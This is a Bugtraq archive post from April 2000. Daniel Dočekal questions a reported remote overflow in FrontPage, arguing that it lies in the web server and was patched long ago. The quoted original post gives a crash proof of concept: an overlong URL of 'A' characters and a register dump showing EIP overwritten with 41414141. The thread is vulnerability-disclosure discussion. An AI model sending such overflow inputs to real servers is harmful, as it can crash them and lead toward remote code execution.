Bugtraq mailing list archives

Re: More vulnerabilities in FP

From: ddoc () MIA CZ (Daniel Dočekal)
Date: Mon, 24 Apr 2000 20:39:12 +0200


That's hardly overflow in FP, VHTTPD32 does not seem to be part of WindowsNT
and more hardly of Frontpage (could be some old version of course), what
operating system are you using?

This seems to be  overflow in HTTP (Web Server, PWS or IIS) and for
WIndowsNT it was handled long time ago in some postfix and service packs.

It would be good idea to include complete information about the system you
are testing, otherwise it is useless.

Daniel

-----Original Message-----
From: Roman [mailto:webmad () MAIL RU]
Sent: Saturday, April 22, 2000 10:16 PM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: Re: More vulnerabilities in FP


Hello,

First remote FrontPage exploit?


How about this one:
<A HREF="http://server/AAAAAAAAAAAA<a">http://server/AAAAAAAAAAAA<a</A> lots of A>AAAAAA

FP will overflow and someone will see this message:

VHTTPD32 caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
ECX=00fe52c4 DS=016f ESI=00fe7744 FS=3647
EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
Bytes at CS:EIP:

Stack dump:
41414141 41414141 66204141 656c6961 6f662064 32312072
2e302e37 2c312e30 61657220 3a6e6f73 6c696620 6f642065
6e207365 6520746f 74736978 00000000

Tested on FP 3.0.2.926. Maybe others?

Current thread:

Re: More vulnerabilities in FP .sozni (Apr 20)
- <Possible follow-ups>
- Re: More vulnerabilities in FP Thomas Dullien (Apr 21)
- Re: More vulnerabilities in FP Roman (Apr 22)
- Re: More vulnerabilities in FP Daniel Dočekal (Apr 24)
  - Re: More vulnerabilities in FP Ian McDonald (Apr 26)
  - ISS Security Advisory: Insecure file handling in IBM frcactrl program Aleph One (Apr 26)